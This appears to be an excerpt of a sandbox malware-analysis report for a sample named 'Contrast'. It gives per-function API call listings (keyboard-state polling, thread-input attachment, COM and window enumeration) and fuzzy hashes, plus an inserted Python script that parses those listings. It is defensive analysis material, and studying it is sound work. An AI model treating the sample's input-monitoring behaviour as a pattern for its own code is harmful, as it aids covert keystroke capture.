• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 9d2c17d382d2c3f93a8302cd4135db8d9a20803eb3e48eedd4d599358f979deb
• Instruction ID: d8f911f3b84c94563b9f736bd3d37aafe1de77349be9cde8fd217a7852df9456
• Opcode Fuzzy Hash: 9d2c17d382d2c3f93a8302cd4135db8d9a20803eb3e48eedd4d599358f979deb
• Instruction Fuzzy Hash: 0F414B35A04219AFDF00DFA4D8489ADBFB9FF5C304F008469E955A7261DB70AA49DFA0
APIs
• GetKeyboardState.USER32(?), ref: 00570530
• GetAsyncKeyState.USER32(000000A0), ref: 005705B1
• GetKeyState.USER32(000000A0), ref: 005705CC
• GetAsyncKeyState.USER32(000000A1), ref: 005705E6
• GetKeyState.USER32(000000A1), ref: 005705FB
• GetAsyncKeyState.USER32(00000011), ref: 00570613
• GetKeyState.USER32(00000011), ref: 00570625
• GetAsyncKeyState.USER32(00000012), ref: 0057063D
• GetKeyState.USER32(00000012), ref: 0057064F
• GetAsyncKeyState.USER32(0000005B), ref: 00570667
• GetKeyState.USER32(0000005B), ref: 00570679
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 16806fdfeb2ca4651e64af31750200d698b5a4937d76b1f431fe6a5d3b694675
• Instruction ID: d75eef43d93fef3e5fac4bd3c56e06413536d86dfacf97b8f7971cb27e32f2fe
• Opcode Fuzzy Hash: 16806fdfeb2ca4651e64af31750200d698b5a4937d76b1f431fe6a5d3b694675
• Instruction Fuzzy Hash: 1041D8709047C9ADFF309B64A8143B5BEE07B65304F08E05DD5C94A6C1EBA499D8EF92
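The function above pairs GetAsyncKeyState and GetKeyState against the same virtual-key codes (0xA0, 0xA1, 0x11, 0x12, 0x5B are the standard Windows constants VK_LSHIFT, VK_RSHIFT, VK_CONTROL, VK_MENU and VK_LWIN). When triaging a report like this one it helps to pull the "APIs" bullets into structured records rather than reading them by eye. The script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses the bullet format exactly as printed in this report (api.MODULE(args), ref: address, with the optional "Part of subcall function" prefix) and then reports which modifier keys a function polls through both APIs. The sample input is constructed from lines copied out of the listings on this page; the parser and the VK name table are the example's own.

```python
import re
from collections import defaultdict

# Constructed sample: API bullet lines copied from the function listings in
# this report (the GetAsyncKeyState/GetKeyState function plus three lines from
# other functions that exercise the subcall, no-argument and string-argument
# forms of the format).
SAMPLE_LINES = """
• GetKeyboardState.USER32(?), ref: 00570530
• GetAsyncKeyState.USER32(000000A0), ref: 005705B1
• GetKeyState.USER32(000000A0), ref: 005705CC
• GetAsyncKeyState.USER32(000000A1), ref: 005705E6
• GetKeyState.USER32(000000A1), ref: 005705FB
• GetAsyncKeyState.USER32(00000011), ref: 00570613
• GetKeyState.USER32(00000011), ref: 00570625
• GetAsyncKeyState.USER32(00000012), ref: 0057063D
• GetKeyState.USER32(00000012), ref: 0057064F
• GetAsyncKeyState.USER32(0000005B), ref: 00570667
• GetKeyState.USER32(0000005B), ref: 00570679
  • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
• GetLastError.KERNEL32 ref: 0057BB93
• SetErrorMode.KERNEL32(00000000,READY), ref: 0057BC00
"""

# One bullet line of the report's "APIs" section. The argument list and the
# "Part of subcall function" prefix are both optional.
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


def parse_api_lines(text):
    """Parse Joe Sandbox 'APIs' bullet lines into a list of dicts.

    Arguments stay as the raw tokens the report prints: '?' for a value the
    analyser could not resolve, eight hex digits for a constant, or a literal
    string such as READY.
    """
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            "caller": m.group("caller"),  # only set on 'Part of subcall' lines
        })
    return calls


# Standard Windows virtual-key codes for the modifier keys seen in the listing.
VK_NAMES = {0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL",
            0x12: "VK_MENU", 0x5B: "VK_LWIN"}


def polled_modifier_keys(calls):
    """Return, sorted by name, the keys polled with BOTH GetAsyncKeyState and
    GetKeyState, which is the pattern the listing above shows."""
    seen = defaultdict(set)
    for c in calls:
        if c["api"] in ("GetAsyncKeyState", "GetKeyState") and c["args"]:
            try:
                vk = int(c["args"][0], 16)
            except ValueError:  # '?' or a string literal, not a VK constant
                continue
            seen[vk].add(c["api"])
    both = [vk for vk, apis in seen.items() if len(apis) == 2]
    return sorted(VK_NAMES.get(vk, f"VK_{vk:02X}") for vk in both)


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LINES)
    for c in parsed:
        print(f"{c['ref']:08X} {c['module']}!{c['api']}({', '.join(c['args'])})")
    print("modifier keys polled via both APIs:", polled_modifier_keys(parsed))
```

Run against the whole report text, the same parser lets you group calls by ref address range or by module and ask narrower questions (which functions touch the clipboard, which combine keyboard polling with window-state checks) without re-reading hundreds of listings.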
APIs
  • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
  • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
• CoInitialize.OLE32 ref: 00588AED
• CoUninitialize.OLE32 ref: 00588AF8
• CoCreateInstance.OLE32(?,00000000,00000017,005A3BBC,?), ref: 00588B58
• IIDFromString.OLE32(?,?), ref: 00588BCB
• VariantInit.OLEAUT32(?), ref: 00588C65
• VariantClear.OLEAUT32(?), ref: 00588CC6
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
• Opcode ID: 6394091b9137bf516f2cfc23f5de75f6df825a7ce7cdf036fdf418533a31f9f6
• Instruction ID: a9a04aba9d006d4529ca5db1308c3db55e3bef483bd5f8ef5f50b44cd5d95026
• Opcode Fuzzy Hash: 6394091b9137bf516f2cfc23f5de75f6df825a7ce7cdf036fdf418533a31f9f6
• Instruction Fuzzy Hash: 75618D702087029FD710EF54C849F6ABBE8FF85714F404849F985AB291DB74ED48CBA2
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0057BB13
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0057BB89
• GetLastError.KERNEL32 ref: 0057BB93
• SetErrorMode.KERNEL32(00000000,READY), ref: 0057BC00
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 58ed8d2f857fb97e2ee4f798378f8ed860be78f8b0b09bf4eff13183993c1dd9
• Instruction ID: f2b280511d0c4b7521c824a1ebb0a188e5480c9e212a281d2cf3ad57678d18a8
• Opcode Fuzzy Hash: 58ed8d2f857fb97e2ee4f798378f8ed860be78f8b0b09bf4eff13183993c1dd9
• Instruction Fuzzy Hash: 6A31C235A002099FEB10DF64E849FAEBFB4FF95300F10802AE80D97295DB709941EB50
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 0057357C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: IconLoad
• String ID: ,z]0z]$,z]0z]$blank$info$question$stop$warning
• API String ID: 2457776203-3192911061
• Opcode ID: afab0f0d6fc89643c04da2504850dc580ec32a58f0940c24d3ae7820a6c6187b
• Instruction ID: 3b309a90a72a6002b10f62f4a0c507c758f119f4f5e61c724e4dc332a8470cce
• Opcode Fuzzy Hash: afab0f0d6fc89643c04da2504850dc580ec32a58f0940c24d3ae7820a6c6187b
• Instruction Fuzzy Hash: C311E771648347BEAB005A54FC92DAA7FDCFF15770F20402EFA08A6181E7A56F40B7A0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 0056B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0056B7BD
                                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00569BCC
                                                                                                                                        • GetDlgCtrlID.USER32 ref: 00569BD7
                                                                                                                                        • GetParent.USER32 ref: 00569BF3
                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00569BF6
                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00569BFF
                                                                                                                                        • GetParent.USER32(?), ref: 00569C1B
                                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00569C1E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 1536045017-1403004172
                                                                                                                                        • Opcode ID: 9176d871ff2ea9bd233295b869a7b3929cb1904f85775e10e12d8e4b2cd9d0e0
                                                                                                                                        • Instruction ID: d7c0dcee3de0b54ec602b2a93433488c935fae4f31836bd582c79b053142211e
                                                                                                                                        • Opcode Fuzzy Hash: 9176d871ff2ea9bd233295b869a7b3929cb1904f85775e10e12d8e4b2cd9d0e0
                                                                                                                                        • Instruction Fuzzy Hash: 2B21C174900108AFDF04ABA4DC89EFEBFB9FFA6310F100115F961932E1DB7449189B60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 0056B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0056B7BD
                                                                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00569CB5
                                                                                                                                        • GetDlgCtrlID.USER32 ref: 00569CC0
                                                                                                                                        • GetParent.USER32 ref: 00569CDC
                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00569CDF
                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00569CE8
                                                                                                                                        • GetParent.USER32(?), ref: 00569D04
                                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00569D07
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 1536045017-1403004172
                                                                                                                                        • Opcode ID: ab596a144bdf8d4fe673e465335055553000b87d5f39880050609651c8ec1c30
                                                                                                                                        • Instruction ID: 3c1c7c31dd37d8d1744ca04b06e6aaf1eaec140fa2e52a30876c432f9d07f75b
                                                                                                                                        • Opcode Fuzzy Hash: ab596a144bdf8d4fe673e465335055553000b87d5f39880050609651c8ec1c30
                                                                                                                                        • Instruction Fuzzy Hash: FD21AF75A00109AFDF04ABA4CC89EFEBFB9FFA6300F100115F951972D1DB758929AA60
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32 ref: 00569D27
                                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00569D3C
                                                                                                                                        • _wcscmp.LIBCMT ref: 00569D4E
                                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00569DC9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                        • API String ID: 1704125052-3381328864
                                                                                                                                        • Opcode ID: 047dce46ee32589f9904cccb0cba1d5742a5ad0cc621f73674b7359c0d949e00
                                                                                                                                        • Instruction ID: 819a540c8702775f2d47717d475011ca803f08ea218f6fce4bf6129e3e9974d9
                                                                                                                                        • Opcode Fuzzy Hash: 047dce46ee32589f9904cccb0cba1d5742a5ad0cc621f73674b7359c0d949e00
                                                                                                                                        • Instruction Fuzzy Hash: DF112C76248307BDFB002620EC0ADA67FACFB55324F200036FA10E60D1FE756E155791
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00588FC1
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00588FEE
                                                                                                                                        • CoUninitialize.OLE32 ref: 00588FF8
                                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 005890F8
                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00589225
                                                                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,005A3BDC), ref: 00589259
                                                                                                                                        • CoGetObject.OLE32(?,00000000,005A3BDC,?), ref: 0058927C
                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 0058928F
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0058930F
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0058931F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2395222682-0
                                                                                                                                        • Opcode ID: c934ed1481dedae09bbd94299b19a24a7c69319a9c67a817b7d7185a50887f3d
                                                                                                                                        • Instruction ID: 37f0a3d14ef9475fa224388196d86f3015696ff422d5a5393e69a27c6082b59a
                                                                                                                                        • Opcode Fuzzy Hash: c934ed1481dedae09bbd94299b19a24a7c69319a9c67a817b7d7185a50887f3d
                                                                                                                                        • Instruction Fuzzy Hash: 0DC13971208305AFD700EF64C88896BBBE9FF89748F04491DF98AAB251DB71ED45CB52
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 005719EF
                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00570A67,?,00000001), ref: 00571A03
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00571A0A
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00570A67,?,00000001), ref: 00571A19
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00571A2B
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00570A67,?,00000001), ref: 00571A44
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00570A67,?,00000001), ref: 00571A56
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00570A67,?,00000001), ref: 00571A9B
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00570A67,?,00000001), ref: 00571AB0
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00570A67,?,00000001), ref: 00571ABB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2156557900-0
                                                                                                                                        • Opcode ID: 924764125a8fbb75140cafd3c7401a156bf7e9aa1f9bebc5e880a6055fa8efd6
                                                                                                                                        • Instruction ID: 580400403e58b564a74f9ac5ba8d2c0ffae96bacac408a1fcea5759b77787f32
                                                                                                                                        • Opcode Fuzzy Hash: 924764125a8fbb75140cafd3c7401a156bf7e9aa1f9bebc5e880a6055fa8efd6
                                                                                                                                        • Instruction Fuzzy Hash: 7931E171512604AFDB309F18ED44FB93BAAFB75319F108116F808C7190DB74DD88AB94
                                                                                                                                        APIs
                                                                                                                                        • GetSysColor.USER32(00000008), ref: 0051260D
                                                                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00512617
                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0051262C
                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 00512634
                                                                                                                                        • GetClientRect.USER32(?), ref: 0054C0FC
                                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0054C113
                                                                                                                                        • GetWindowDC.USER32(?), ref: 0054C11F
                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0054C12E
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 0054C140
                                                                                                                                        • GetSysColor.USER32(00000005), ref: 0054C15E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3430376129-0
                                                                                                                                        • Opcode ID: 21ae8b34c1573931fb8da0ba6fb09ff37e06ac5a267473d6f32eff84858411ca
                                                                                                                                        • Instruction ID: ce6a6e5c3538ea7b7f0edcf4b67b4f59cdf450566b2b989bd87c0699c859ead6
                                                                                                                                        • Opcode Fuzzy Hash: 21ae8b34c1573931fb8da0ba6fb09ff37e06ac5a267473d6f32eff84858411ca
                                                                                                                                        • Instruction Fuzzy Hash: 1B11BB31510204BFEB615FA4EC48BE97FB2FB6A321F104225FA65950E1CB3109A9FF10
                                                                                                                                        APIs
                                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0051ADE1
                                                                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 0051AE80
                                                                                                                                        • UnregisterHotKey.USER32(?), ref: 0051AFD7
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00552F64
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00552FC9
                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00552FF6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                        • String ID: close all
                                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                                        • Opcode ID: 3adedb2392134bcd8b1c33b633f8b9b375aa9542b635228dd4a638694735908d
                                                                                                                                        • Instruction ID: 95c0040f4291b4cbcdfcd2475399577d717ccc05aac6df207310fa46cb9d37cc
                                                                                                                                        • Opcode Fuzzy Hash: 3adedb2392134bcd8b1c33b633f8b9b375aa9542b635228dd4a638694735908d
                                                                                                                                        • Instruction Fuzzy Hash: A2A1B234302213CFDB19EF14D4A9A69FB64FF55741F1042ADE80AAB2A1DB30AD56CF91
                                                                                                                                        APIs
                                                                                                                                        • EnumChildWindows.USER32(?,0056B13A), ref: 0056B078
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ChildEnumWindows
                                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                        • API String ID: 3555792229-1603158881
                                                                                                                                        • Opcode ID: 0ee1724c93b33f33d6e61888cff9300d3f07e0c50f8b6a58266f55774f656653
                                                                                                                                        • Instruction ID: c0c99ace6a77dd15dd06524f310f22968605b3b3d84cae3df6cfc9c7355546fd
                                                                                                                                        • Opcode Fuzzy Hash: 0ee1724c93b33f33d6e61888cff9300d3f07e0c50f8b6a58266f55774f656653
